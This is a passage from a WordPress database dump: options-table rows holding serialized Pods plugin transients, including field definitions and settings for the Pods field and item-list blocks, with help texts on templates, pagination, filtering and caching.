:\"object\";s:11:\"pick_output\";s:3:\"ids\";s:5:\"alias\";a:1:{i:0;s:6:\"parent\";}s:4:\"data\";a:0:{}s:6:\"hidden\";b:1;}s:4:\"guid\";a:22:{s:2:\"id\";i:0;s:4:\"name\";s:4:\"guid\";s:5:\"label\";s:4:\"GUID\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:4:\"text\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:0:{}s:5:\"alias\";a:0:{}s:6:\"hidden\";b:1;s:20:\"hide_in_default_form\";b:1;}s:10:\"menu_order\";a:20:{s:2:\"id\";i:0;s:4:\"name\";s:10:\"menu_order\";s:5:\"label\";s:10:\"Menu Order\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:6:\"number\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:1:{s:13:\"number_format\";s:7:\"9999.99\";}s:5:\"alias\";a:0:{}}s:9:\"post_type\";a:22:{s:2:\"id\";i:0;s:4:\"name\";s:9:\"post_type\";s:5:\"label\";s:4:\"Type\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:4:\"text\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:0:{}s:5:\"alias\";a:1:{i:0;s:4:\"type\";}s:6:\"hidden\";b:1;s:20:\"hide_in_default_form\";b:1;}s:14:\"post_mime_type\";a:22:{s:2:\"id\";i:0;s:4:\"name\";s:14:\"post_mime_type\";s:5:\"label\";s:9:\"Mime Type\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:4:\"text\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:0:{}s:5:\"alias\";a:0:{}s:6:\"hidden\";b:1;s:20:\"hide_in_default_form\";b:1;}s:13:\"comment_count\";a:22:{s:2:\"id\";i:0;s:4:\"name\";s:13:\"comment_count\";s:5:\"label\";s:13:\"Comment Count\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:6:\"number\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:0:{}s:5:\"alias\";a:0:{}s:6:\"hidden\";b:1;s:20:\"hide_in_default_form\";b:1;}s:8:\"comments\";a:24:{s:2:\"id\";i:0;s:4:\"name\";s:8:\"comments\";s:5:\"label\";s:8:\"Comments\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:7:\"comment\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:1:{s:19:\"comment_format_type\";s:5:\"multi\";}s:11:\"pick_object\";s:7:\"comment\";s:8:\"pick_val\";s:7:\"comment\";s:5:\"alias\";a:0:{}s:6:\"hidden\";b:1;s:20:\"hide_in_default_form\";b:1;}}}','off'),(5640114,'_transient_timeout_pods_d2b383175dd496c8db955f4a10ef61c8','1782552323','off'),(5640115,'_transient_pods_d2b383175dd496c8db955f4a10ef61c8','a:0:{}','off'),(5640116,'_transient_timeout_pods_ff4c9687544a77c513842f49b790273b','1782552323','off'),(5640117,'_transient_pods_ff4c9687544a77c513842f49b790273b','a:0:{}','off'),(5640118,'_transient_timeout_pods_7c63e439d8ccbe68920b8b221c0f10f1','1782552323','off'),(5640119,'_transient_pods_7c63e439d8ccbe68920b8b221c0f10f1','a:0:{}','off'),(5640120,'_transient_timeout_pods_bf2c8870ccd8bf0fca0901f28169d865','1782552323','off'),(5640121,'_transient_pods_bf2c8870ccd8bf0fca0901f28169d865','a:0:{}','off'),(5618900,'_transient_timeout_jet_elements_categories_2.5.8','1782404909','off'),(5618901,'_transient_jet_elements_categories_2.5.8','a:0:{}','off'),(5629486,'_transient_timeout_jetpack_a8c_data','1782249899','off'),(5629487,'_transient_jetpack_a8c_data','a:4:{s:4:\"a12s\";i:1453;s:9:\"countries\";i:82;s:9:\"languages\";s:3:\"108\";s:16:\"featured_plugins\";a:4:{i:0;s:11:\"woocommerce\";i:1;s:11:\"activitypub\";i:2;s:14:\"wp-job-manager\";i:3;s:14:\"wp-super-cache\";}}','off'),(5629439,'_transient_timeout_pods_pods_blocks_js-3282','1782249721','off'),(5629440,'_transient_pods_pods_blocks_js-3282','a:6:{i:0;a:15:{s:9:\"blockName\";s:21:\"pods/pods-block-field\";s:15:\"blockGroupLabel\";s:7:\"Options\";s:5:\"title\";s:16:\"Pods Field Value\";s:11:\"description\";s:56:\"Display a single Pod item\'s field value (custom fields).\";s:10:\"renderType\";s:3:\"php\";s:8:\"category\";s:4:\"pods\";s:4:\"icon\";s:4:\"pods\";s:8:\"keywords\";a:5:{i:0;s:4:\"pods\";i:1;s:5:\"field\";i:2;s:5:\"value\";i:3;s:6:\"custom\";i:4;s:4:\"meta\";}s:8:\"supports\";a:13:{s:4:\"html\";b:0;s:5:\"align\";b:1;s:9:\"alignWide\";b:1;s:6:\"anchor\";b:0;s:15:\"customClassName\";b:1;s:8:\"inserter\";b:1;s:8:\"multiple\";b:1;s:8:\"reusable\";b:1;s:19:\"__experimentalColor\";b:1;s:22:\"__experimentalFontSize\";b:1;s:21:\"__experimentalPadding\";b:1;s:24:\"__experimentalLineHeight\";b:1;s:3:\"jsx\";b:0;}s:12:\"editorScript\";s:15:\"pods-blocks-api\";s:11:\"usesContext\";a:2:{i:0;s:8:\"postType\";i:1;s:6:\"postId\";}s:15:\"providesContext\";a:0:{}s:6:\"fields\";a:5:{i:0;a:4:{s:4:\"type\";s:13:\"SelectControl\";s:12:\"fieldOptions\";a:4:{s:7:\"heading\";s:8:\"Pod Name\";s:7:\"options\";a:13:{i:0;a:2:{s:5:\"label\";s:19:\"- Use Current Pod -\";s:5:\"value\";s:0:\"\";}i:1;a:2:{s:5:\"label\";s:8:\"document\";s:5:\"value\";s:8:\"document\";}i:2;a:2:{s:5:\"label\";s:13:\"ekms_bulletin\";s:5:\"value\";s:13:\"ekms_bulletin\";}i:3;a:2:{s:5:\"label\";s:11:\"institution\";s:5:\"value\";s:11:\"institution\";}i:4;a:2:{s:5:\"label\";s:21:\"institutions_category\";s:5:\"value\";s:21:\"institutions_category\";}i:5;a:2:{s:5:\"label\";s:16:\"knowledge_broker\";s:5:\"value\";s:16:\"knowledge_broker\";}i:6;a:2:{s:5:\"label\";s:12:\"mea_resource\";s:5:\"value\";s:12:\"mea_resource\";}i:7;a:2:{s:5:\"label\";s:16:\"project_resource\";s:5:\"value\";s:16:\"project_resource\";}i:8;a:2:{s:5:\"label\";s:13:\"related_topic\";s:5:\"value\";s:13:\"related_topic\";}i:9;a:2:{s:5:\"label\";s:17:\"resource_category\";s:5:\"value\";s:17:\"resource_category\";}i:10;a:2:{s:5:\"label\";s:12:\"resource_tag\";s:5:\"value\";s:12:\"resource_tag\";}i:11;a:2:{s:5:\"label\";s:13:\"resource_type\";s:5:\"value\";s:13:\"resource_type\";}i:12;a:2:{s:5:\"label\";s:10:\"university\";s:5:\"value\";s:10:\"university\";}}s:4:\"help\";s:87:\"Choose the pod to reference, or reference the Pod in the current context of this block.\";s:5:\"label\";s:8:\"Pod Name\";}s:16:\"attributeOptions\";a:2:{s:4:\"type\";s:6:\"object\";s:7:\"default\";a:2:{s:5:\"label\";s:19:\"- Use Current Pod -\";s:5:\"value\";s:0:\"\";}}s:4:\"name\";s:4:\"name\";}i:1;a:4:{s:4:\"type\";s:4:\"html\";s:12:\"fieldOptions\";a:5:{s:9:\"className\";s:15:\"text__container\";s:4:\"type\";s:4:\"text\";s:4:\"help\";s:0:\"\";s:12:\"html_content\";s:204:\"Read about how access rights control what can be displayed to other users: <a href=\"https://docs.pods.io/displaying-pods/access-rights-in-pods/\" target=\"_blank\" rel=\"noopener noreferrer\">Documentation</a>\";s:5:\"label\";s:13:\"Access Rights\";}s:16:\"attributeOptions\";a:1:{s:4:\"type\";s:6:\"string\";}s:4:\"name\";s:18:\"access_rights_help\";}i:2;a:4:{s:4:\"type\";s:11:\"TextControl\";s:12:\"fieldOptions\";a:4:{s:9:\"className\";s:15:\"text__container\";s:4:\"type\";s:4:\"text\";s:4:\"help\";s:39:\"Defaults to using the current pod item.\";s:5:\"label\";s:10:\"Slug or ID\";}s:16:\"attributeOptions\";a:1:{s:4:\"type\";s:6:\"string\";}s:4:\"name\";s:4:\"slug\";}i:3;a:4:{s:4:\"type\";s:11:\"TextControl\";s:12:\"fieldOptions\";a:4:{s:9:\"className\";s:15:\"text__container\";s:4:\"type\";s:4:\"text\";s:4:\"help\";s:43:\"This is the field name you want to display.\";s:5:\"label\";s:10:\"Field Name\";}s:16:\"attributeOptions\";a:1:{s:4:\"type\";s:6:\"string\";}s:4:\"name\";s:5:\"field\";}i:4;a:4:{s:4:\"type\";s:11:\"TextControl\";s:12:\"fieldOptions\";a:4:{s:9:\"className\";s:15:\"text__container\";s:4:\"type\";s:4:\"text\";s:4:\"help\";s:93:\"You can specify a field to link the output to. Like \"permalink\" or \"related_field.permalink\".\";s:5:\"label\";s:26:\"Link Field Name (optional)\";}s:16:\"attributeOptions\";a:1:{s:4:\"type\";s:6:\"string\";}s:4:\"name\";s:10:\"link_field\";}}s:10:\"attributes\";a:10:{s:5:\"align\";a:1:{s:4:\"type\";s:6:\"string\";}s:9:\"textColor\";a:1:{s:4:\"type\";s:6:\"string\";}s:15:\"backgroundColor\";a:1:{s:4:\"type\";s:6:\"string\";}s:8:\"fontSize\";a:1:{s:4:\"type\";s:6:\"string\";}s:5:\"style\";a:1:{s:4:\"type\";s:6:\"string\";}s:4:\"name\";a:2:{s:4:\"type\";s:6:\"object\";s:7:\"default\";a:2:{s:5:\"label\";s:19:\"- Use Current Pod -\";s:5:\"value\";s:0:\"\";}}s:18:\"access_rights_help\";a:1:{s:4:\"type\";s:6:\"string\";}s:4:\"slug\";a:1:{s:4:\"type\";s:6:\"string\";}s:5:\"field\";a:1:{s:4:\"type\";s:6:\"string\";}s:10:\"link_field\";a:1:{s:4:\"type\";s:6:\"string\";}}s:10:\"transforms\";a:1:{s:4:\"from\";a:1:{i:0;a:4:{s:4:\"type\";s:9:\"shortcode\";s:3:\"tag\";s:4:\"pods\";s:10:\"attributes\";a:4:{s:4:\"name\";a:3:{s:4:\"type\";s:6:\"object\";s:6:\"source\";s:9:\"shortcode\";s:9:\"attribute\";s:4:\"name\";}s:4:\"slug\";a:3:{s:4:\"type\";s:6:\"string\";s:6:\"source\";s:9:\"shortcode\";s:9:\"attribute\";s:4:\"slug\";}s:5:\"field\";a:3:{s:4:\"type\";s:6:\"string\";s:6:\"source\";s:9:\"shortcode\";s:9:\"attribute\";s:5:\"field\";}s:10:\"link_field\";a:3:{s:4:\"type\";s:6:\"string\";s:6:\"source\";s:9:\"shortcode\";s:9:\"attribute\";s:10:\"link_field\";}}s:13:\"isMatchConfig\";a:1:{i:0;a:2:{s:4:\"name\";s:5:\"field\";s:8:\"required\";b:1;}}}}}}i:1;a:15:{s:9:\"blockName\";s:20:\"pods/pods-block-list\";s:15:\"blockGroupLabel\";s:7:\"Options\";s:5:\"title\";s:14:\"Pods Item List\";s:11:\"description\";s:24:\"List multiple Pod items.\";s:10:\"renderType\";s:3:\"php\";s:8:\"category\";s:4:\"pods\";s:4:\"icon\";s:4:\"pods\";s:8:\"keywords\";a:3:{i:0;s:4:\"pods\";i:1;s:4:\"item\";i:2;s:4:\"list\";}s:8:\"supports\";a:13:{s:4:\"html\";b:0;s:5:\"align\";b:1;s:9:\"alignWide\";b:1;s:6:\"anchor\";b:0;s:15:\"customClassName\";b:1;s:8:\"inserter\";b:1;s:8:\"multiple\";b:1;s:8:\"reusable\";b:1;s:19:\"__experimentalColor\";b:1;s:22:\"__experimentalFontSize\";b:1;s:21:\"__experimentalPadding\";b:1;s:24:\"__experimentalLineHeight\";b:1;s:3:\"jsx\";b:0;}s:12:\"editorScript\";s:15:\"pods-blocks-api\";s:11:\"usesContext\";a:1:{i:0;s:8:\"postType\";}s:15:\"providesContext\";a:0:{}s:6:\"fields\";a:19:{i:0;a:4:{s:4:\"type\";s:13:\"SelectControl\";s:12:\"fieldOptions\";a:4:{s:7:\"heading\";s:8:\"Pod Name\";s:7:\"options\";a:13:{i:0;a:2:{s:5:\"label\";s:19:\"- Use Current Pod -\";s:5:\"value\";s:0:\"\";}i:1;a:2:{s:5:\"label\";s:8:\"document\";s:5:\"value\";s:8:\"document\";}i:2;a:2:{s:5:\"label\";s:13:\"ekms_bulletin\";s:5:\"value\";s:13:\"ekms_bulletin\";}i:3;a:2:{s:5:\"label\";s:11:\"institution\";s:5:\"value\";s:11:\"institution\";}i:4;a:2:{s:5:\"label\";s:21:\"institutions_category\";s:5:\"value\";s:21:\"institutions_category\";}i:5;a:2:{s:5:\"label\";s:16:\"knowledge_broker\";s:5:\"value\";s:16:\"knowledge_broker\";}i:6;a:2:{s:5:\"label\";s:12:\"mea_resource\";s:5:\"value\";s:12:\"mea_resource\";}i:7;a:2:{s:5:\"label\";s:16:\"project_resource\";s:5:\"value\";s:16:\"project_resource\";}i:8;a:2:{s:5:\"label\";s:13:\"related_topic\";s:5:\"value\";s:13:\"related_topic\";}i:9;a:2:{s:5:\"label\";s:17:\"resource_category\";s:5:\"value\";s:17:\"resource_category\";}i:10;a:2:{s:5:\"label\";s:12:\"resource_tag\";s:5:\"value\";s:12:\"resource_tag\";}i:11;a:2:{s:5:\"label\";s:13:\"resource_type\";s:5:\"value\";s:13:\"resource_type\";}i:12;a:2:{s:5:\"label\";s:10:\"university\";s:5:\"value\";s:10:\"university\";}}s:4:\"help\";s:87:\"Choose the pod to reference, or reference the Pod in the current context of this block.\";s:5:\"label\";s:8:\"Pod Name\";}s:16:\"attributeOptions\";a:2:{s:4:\"type\";s:6:\"object\";s:7:\"default\";a:2:{s:5:\"label\";s:19:\"- Use Current Pod -\";s:5:\"value\";s:0:\"\";}}s:4:\"name\";s:4:\"name\";}i:1;a:4:{s:4:\"type\";s:4:\"html\";s:12:\"fieldOptions\";a:5:{s:9:\"className\";s:15:\"text__container\";s:4:\"type\";s:4:\"text\";s:4:\"help\";s:0:\"\";s:12:\"html_content\";s:204:\"Read about how access rights control what can be displayed to other users: <a href=\"https://docs.pods.io/displaying-pods/access-rights-in-pods/\" target=\"_blank\" rel=\"noopener noreferrer\">Documentation</a>\";s:5:\"label\";s:13:\"Access Rights\";}s:16:\"attributeOptions\";a:1:{s:4:\"type\";s:6:\"string\";}s:4:\"name\";s:18:\"access_rights_help\";}i:2;a:4:{s:4:\"type\";s:13:\"SelectControl\";s:12:\"fieldOptions\";a:4:{s:7:\"heading\";s:8:\"Template\";s:7:\"options\";a:3:{i:0;a:2:{s:5:\"label\";s:23:\"- Use Custom Template -\";s:5:\"value\";s:0:\"\";}i:1;a:2:{s:5:\"label\";s:26:\"knowledge-brokers-template\";s:5:\"value\";s:26:\"knowledge-brokers-template\";}i:2;a:2:{s:5:\"label\";s:25:\"project-resource-template\";s:5:\"value\";s:25:\"project-resource-template\";}}s:4:\"help\";s:168:\"You can choose a previously saved Pods Template here. We recommend saving your Pods Templates with our Templates component so you can enjoy the full editing experience.\";s:5:\"label\";s:8:\"Template\";}s:16:\"attributeOptions\";a:2:{s:4:\"type\";s:6:\"object\";s:7:\"default\";a:2:{s:5:\"label\";s:23:\"- Use Custom Template -\";s:5:\"value\";s:0:\"\";}}s:4:\"name\";s:8:\"template\";}i:3;a:4:{s:4:\"type\";s:15:\"TextareaControl\";s:12:\"fieldOptions\";a:4:{s:9:\"className\";s:19:\"textarea__container\";s:6:\"auto_p\";b:1;s:4:\"help\";s:149:\"You can specify a custom template to use, it accepts HTML and magic tags. Any content here will override whatever Template you may have chosen above.\";s:5:\"label\";s:15:\"Custom Template\";}s:16:\"attributeOptions\";a:1:{s:4:\"type\";s:6:\"string\";}s:4:\"name\";s:15:\"template_custom\";}i:4;a:4:{s:4:\"type\";s:15:\"TextareaControl\";s:12:\"fieldOptions\";a:4:{s:9:\"className\";s:19:\"textarea__container\";s:6:\"auto_p\";b:1;s:4:\"help\";s:247:\"This content will appear before the list of templated items. A useful way to use this option is if you have a template that uses \"li\" HTML tags, you can use the \"ul\" HTML tag to start an unordered list. This will only be shown if items were found.\";s:5:\"label\";s:19:\"Content Before List\";}s:16:\"attributeOptions\";a:1:{s:4:\"type\";s:6:\"string\";}s:4:\"name\";s:14:\"content_before\";}i:5;a:4:{s:4:\"type\";s:15:\"TextareaControl\";s:12:\"fieldOptions\";a:4:{s:9:\"className\";s:19:\"textarea__container\";s:6:\"auto_p\";b:1;s:4:\"help\";s:245:\"This content will appear after the list of templated items. A useful way to use this option is if you have a template that uses \"li\" HTML tags, you can use the \"/ul\" HTML tag to end an unordered list. This will only be shown if items were found.\";s:5:\"label\";s:18:\"Content After List\";}s:16:\"attributeOptions\";a:1:{s:4:\"type\";s:6:\"string\";}s:4:\"name\";s:13:\"content_after\";}i:6;a:4:{s:4:\"type\";s:15:\"TextareaControl\";s:12:\"fieldOptions\";a:4:{s:9:\"className\";s:19:\"textarea__container\";s:6:\"auto_p\";b:1;s:4:\"help\";s:77:\"If there are no items shown, this content will be shown in the block\'s place.\";s:5:\"label\";s:17:\"Not Found Content\";}s:16:\"attributeOptions\";a:2:{s:4:\"type\";s:6:\"string\";s:7:\"default\";s:21:\"No content was found.\";}s:4:\"name\";s:9:\"not_found\";}i:7;a:4:{s:4:\"type\";s:13:\"NumberControl\";s:12:\"fieldOptions\";a:5:{s:18:\"isShiftStepEnabled\";b:0;s:9:\"shiftStep\";b:0;s:4:\"step\";i:1;s:4:\"help\";s:346:\"Specify the number of items to show but keep in mind that the more items you show the longer it may take for the page to load. You should avoid using \"-1\" here unless you know what you\'re doing. If your pod has many items, it could stop the page from loading and cause errors. Default number of items to show is to show 15 items. See also: find()\";s:5:\"label\";s:5:\"Limit\";}s:16:\"attributeOptions\";a:2:{s:4:\"type\";s:6:\"number\";s:7:\"default\";i:15;}s:4:\"name\";s:5:\"limit\";}i:8;a:4:{s:4:\"type\";s:11:\"TextControl\";s:12:\"fieldOptions\";a:4:{s:9:\"className\";s:15:\"text__container\";s:4:\"type\";s:4:\"text\";s:4:\"help\";s:256:\"You can specify what field to order by here. That could be t.post_title ASC or you may want to use a custom field like my_field.meta_value ASC. The normal MySQL syntax works here, so you can sort ascending with ASC or descending with DESC. See also: find()\";s:5:\"label\";s:8:\"Order By\";}s:16:\"attributeOptions\";a:1:{s:4:\"type\";s:6:\"string\";}s:4:\"name\";s:7:\"orderby\";}i:9;a:4:{s:4:\"type\";s:11:\"TextControl\";s:12:\"fieldOptions\";a:4:{s:9:\"className\";s:15:\"text__container\";s:4:\"type\";s:4:\"text\";s:4:\"help\";s:290:\"You can specify what field to restrict the item list by here. That could be t.post_title LIKE \"%repairs%\" or you may want to reference a custom field like  my_field.meta_value = \"123\". For a list of all things available for you to query, follow the find() Notation Options. See also: find()\";s:5:\"label\";s:5:\"Where\";}s:16:\"attributeOptions\";a:1:{s:4:\"type\";s:6:\"string\";}s:4:\"name\";s:5:\"where\";}i:10;a:4:{s:4:\"type\";s:15:\"CheckboxControl\";s:12:\"fieldOptions\";a:3:{s:7:\"heading\";s:17:\"Enable Pagination\";s:5:\"label\";s:3:\"Yes\";s:4:\"help\";s:116:\"Whether to show pagination for the list of items. This will only show if there is more than one page of items found.\";}s:16:\"attributeOptions\";a:2:{s:4:\"type\";s:7:\"boolean\";s:7:\"default\";b:0;}s:4:\"name\";s:10:\"pagination\";}i:11;a:4:{s:4:\"type\";s:13:\"SelectControl\";s:12:\"fieldOptions\";a:4:{s:7:\"heading\";s:19:\"Pagination Location\";s:7:\"options\";a:3:{i:0;a:2:{s:5:\"label\";s:11:\"Before list\";s:5:\"value\";s:6:\"before\";}i:1;a:2:{s:5:\"label\";s:10:\"After list\";s:5:\"value\";s:5:\"after\";}i:2;a:2:{s:5:\"label\";s:21:\"Before and After list\";s:5:\"value\";s:4:\"both\";}}s:4:\"help\";s:36:\"The location to show the pagination.\";s:5:\"label\";s:19:\"Pagination Location\";}s:16:\"attributeOptions\";a:2:{s:4:\"type\";s:6:\"object\";s:7:\"default\";a:2:{s:5:\"label\";s:10:\"After list\";s:5:\"value\";s:5:\"after\";}}s:4:\"name\";s:19:\"pagination_location\";}i:12;a:4:{s:4:\"type\";s:13:\"SelectControl\";s:12:\"fieldOptions\";a:4:{s:7:\"heading\";s:15:\"Pagination Type\";s:7:\"options\";a:4:{i:0;a:2:{s:5:\"label\";s:11:\"Basic links\";s:5:\"value\";s:8:\"advanced\";}i:1;a:2:{s:5:\"label\";s:28:\"Previous and Next Links only\";s:5:\"value\";s:6:\"simple\";}i:2;a:2:{s:5:\"label\";s:64:\"Use an unordered list with paginate_links() native functionality\";s:5:\"value\";s:4:\"list\";}i:3;a:2:{s:5:\"label\";s:47:\"Use basic paginate_links() native functionality\";s:5:\"value\";s:8:\"paginate\";}}s:4:\"help\";s:43:\"Choose which kind of pagination to display.\";s:5:\"label\";s:15:\"Pagination Type\";}s:16:\"attributeOptions\";a:2:{s:4:\"type\";s:6:\"object\";s:7:\"default\";a:2:{s:5:\"label\";s:11:\"Basic links\";s:5:\"value\";s:8:\"advanced\";}}s:4:\"name\";s:15:\"pagination_type\";}i:13;a:4:{s:4:\"type\";s:15:\"CheckboxControl\";s:12:\"fieldOptions\";a:3:{s:7:\"heading\";s:14:\"Enable Filters\";s:5:\"label\";s:3:\"Yes\";s:4:\"help\";s:46:\"Whether to show filters for the list of items.\";}s:16:\"attributeOptions\";a:2:{s:4:\"type\";s:7:\"boolean\";s:7:\"default\";b:0;}s:4:\"name\";s:14:\"filters_enable\";}i:14;a:4:{s:4:\"type\";s:11:\"TextControl\";s:12:\"fieldOptions\";a:4:{s:9:\"className\";s:15:\"text__container\";s:4:\"type\";s:4:\"text\";s:4:\"help\";s:115:\"Comma-separated list of fields you want to allow filtering by. Default is to just show a text field to search with.\";s:5:\"label\";s:13:\"Filter Fields\";}s:16:\"attributeOptions\";a:1:{s:4:\"type\";s:6:\"string\";}s:4:\"name\";s:7:\"filters\";}i:15;a:4:{s:4:\"type\";s:11:\"TextControl\";s:12:\"fieldOptions\";a:4:{s:9:\"className\";s:15:\"text__container\";s:4:\"type\";s:4:\"text\";s:4:\"help\";s:55:\"The label to show for the filters. Default is \"Search\".\";s:5:\"label\";s:20:\"Custom Filters Label\";}s:16:\"attributeOptions\";a:1:{s:4:\"type\";s:6:\"string\";}s:4:\"name\";s:13:\"filters_label\";}i:16;a:4:{s:4:\"type\";s:13:\"SelectControl\";s:12:\"fieldOptions\";a:4:{s:7:\"heading\";s:16:\"Filters Location\";s:7:\"options\";a:2:{i:0;a:2:{s:5:\"label\";s:11:\"Before list\";s:5:\"value\";s:6:\"before\";}i:1;a:2:{s:5:\"label\";s:10:\"After list\";s:5:\"value\";s:5:\"after\";}}s:4:\"help\";s:33:\"The location to show the filters.\";s:5:\"label\";s:16:\"Filters Location\";}s:16:\"attributeOptions\";a:2:{s:4:\"type\";s:6:\"object\";s:7:\"default\";a:2:{s:5:\"label\";s:11:\"Before list\";s:5:\"value\";s:6:\"before\";}}s:4:\"name\";s:16:\"filters_location\";}i:17;a:4:{s:4:\"type\";s:13:\"SelectControl\";s:12:\"fieldOptions\";a:4:{s:7:\"heading\";s:10:\"Cache Mode\";s:7:\"options\";a:4:{i:0;a:2:{s:5:\"label\";s:15:\"Disable Caching\";s:5:\"value\";s:4:\"none\";}i:1;a:2:{s:5:\"label\";s:12:\"Object Cache\";s:5:\"value\";s:5:\"cache\";}i:2;a:2:{s:5:\"label\";s:9:\"Transient\";s:5:\"value\";s:9:\"transient\";}i:3;a:2:{s:5:\"label\";s:14:\"Site Transient\";s:5:\"value\";s:14:\"site-transient\";}}s:4:\"help\";s:34:\"The mode to cache the output with.\";s:5:\"label\";s:10:\"Cache Mode\";}s:16:\"attributeOptions\";a:2:{s:4:\"type\";s:6:\"object\";s:7:\"default\";a:2:{s:5:\"label\";s:15:\"Disable Caching\";s:5:\"value\";s:4:\"none\";}}s:4:\"name\";s:10:\"cache_mode\";}i:18;a:4:{s:4:\"type\";s:13:\"NumberControl\";s:12:\"fieldOptions\";a:5:{s:18:\"isShiftStepEnabled\";b:0;s:9:\"shiftStep\";b:0;s:4:\"step\";i:1;s:4:\"help\";s:48:\"Set how long to cache the output for in seconds.\";s:5:\"label\";s:7:\"Expires\";}s:16:\"attributeOptions\";a:2:{s:4:\"type\";s:6:\"number\";s:7:\"default\";i:300;}s:4:\"name\";s:7:\"expires\";}}s:10:\"attributes\";a:24:{s:5:\"align\";a:1:{s:4:\"type\";s:6:\"string\";}s:9:\"textColor\";a:1:{s:4:\"type\";s:6:\"string\";}s:15:\"backgroundColor\";a:1:{s:4:\"type\";s:6:\"string\";}s:8:\"fontSize\";a:1:{s:4:\"type\";s:6:\"string\";}s:5:\"style\";a:1:{s:4:\"type\";s:6:\"string\";}s:4:\"name\";a:2:{s:4:\"type\";s:6:\"object\";s:7:\"default\";a:2:{s:5:\"label\";s:19:\"- Use Current Pod -\";s:5:\"value\";s:0:\"\";}}s:18:\"access_rights_help\";a:1:{s:4:\"type\";s:6:\"string\";}s:8:\"template\";a:2:{s:4:\"type\";s:6:\"object\";s:7:\"default\";a:2:{s:5:\"label\";s:23:\"- Use Custom Template -\";s:5:\"value\";s:0:\"\";}}s:15:\"template_custom\";a:1:{s:4:\"type\";s:6:\"string\";}s:14:\"content_before\";a:1:{s:4:\"type\";s:6:\"string\";}s:13:\"content_after\";a:1:{s:4:\"type\";s:6:\"string\";}s:9:\"not_found\";a:2:{s:4:\"type\";s:6:\"string\";s:7:\"default\";s:21:\"No content was found.\";}s:5:\"limit\";a:2:{s:4:\"type\";s:6:\"number\";s:7:\"default\";i:15;}s:7:\"orderby\";a:1:{s:4:\"type\";s:6:\"string\";}s:5:\"where\";a:1:{s:4:\"type\";s:6:\"string\";}s:10:\"pagination\";a:2:{s:4:\"type\";s:7:\"boolean\";s:7:\"default\";b:0;}s:19:\"pagination_location\";a:2:{s:4:\"type\";s:6:\"object\";s:7:\"default\";a:2:{s:5:\"label\";s:10:\"After list\";s:5:\"value\";s:5:\"after\";}}s:15:\"pagination_type\";a:2:{s:4:\"type\";s:6:\"object\";s:7:\"default\";a:2:{s:5:\"label\";s:11:\"Basic links\";s:5:\"value\";s:8:\"advanced\";}}s:14:\"filters_enable\";a:2:{s:4:\"type\";s:7:\"boolean\";s:7:\"default\";b:0;}s:7:\"filters\";a:1:{s:4:\"type\";s:6:\"string\";}s:13:\"filters_label\";a:1:{s:4:\"type\";s:6:\"string\";}s:16:\"filters_location\";a:2:{s:4:\"type\";s:6:\"object\";s:7:\"default\";a:2:{s:5:\"label\";s:11:\"Before list\";s:5:\"value\";s:6:\"before\";}}s:10:\"cache_mode\";a:2:{s:4:\"type\";s:6:\"object\";s:7:\"default\";a:2:{s:5:\"label\";s:15:\"Disable 